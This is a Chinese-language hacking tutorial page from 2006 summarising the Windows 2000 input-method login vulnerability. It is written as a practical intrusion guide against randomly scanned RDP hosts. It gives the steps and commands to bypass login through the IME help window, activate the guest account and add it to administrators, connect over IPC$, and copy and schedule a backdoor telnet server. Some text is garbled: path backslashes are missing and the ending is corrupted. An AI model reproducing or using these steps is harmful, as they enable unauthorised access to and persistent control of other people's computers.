输入法漏洞,输入法漏洞总结篇

输入法漏洞总结篇 - 电脑安全 - 电脑教程网

输入法漏洞总结篇

日期:2006-11-29   荐:

输入法漏洞是一个很经典的漏洞,相信大家以前零零散散都玩过本人总结了下出现了的几个输入法漏洞再配合以前一些经典入侵的事例希望对大家有所帮助,或许在入侵过程中有用呢说明:本人只是做个总结,以上引用了不少大侠的文章

<<全拼输入法漏洞入侵>>一,获得管理员账号: 我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入

到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出"帮助"(如果发现"帮助"呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开"帮助"一栏中"操作指南",在最上面的任务栏点击右键,会弹出一个菜单,打开"跳至URL"。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:winntsystem32"。然后按"确定",于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。  现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在"属性"-;"目标"-;c:winntsystem32 et.exe后面空一格,填入"user guest /active :yes"点"确定"。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入"localgroup administrators guest /add,将guest变成系统管理员。二,创建跳板:  再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开"控制面板",进入"网络和拔号连接",在"本地连接"或"拔号连接"中查看属性,看对方是否选择"Microsoft 网络的文件和打印机共享",如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。  退出对方系统,在本地机命令提示符下,输入net use \IP AddressIPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。 copy c:hacksrv.exe \***.***.***.***admin$然后利用定时服务启动它,先了解对方的时间:net time \***.***.***.***显示:\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。然后启动srv.exe:at \***.***.***.*** 09:00 srv.exe 显示:新加了一项作业,其作业 ID = 0过几分钟后,telnet ***.***.***.*** 99 这里不需要验证身份,直接登录,显示:c:winnt:system32我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:copy c:hack tlm.exe \211.21.193.202admin$把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exeC:WINNTsystem32;ntlm显示:Windows 2000 Telnet Dump, by Assassin, All Rights Reserved. Done!C:WINNTsystem32;C:WINNTsystem32;好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务:net stop telnet 系统告诉你并没有启动telnet,不理它,继续:net start telnet 这次娴钠舳

标签: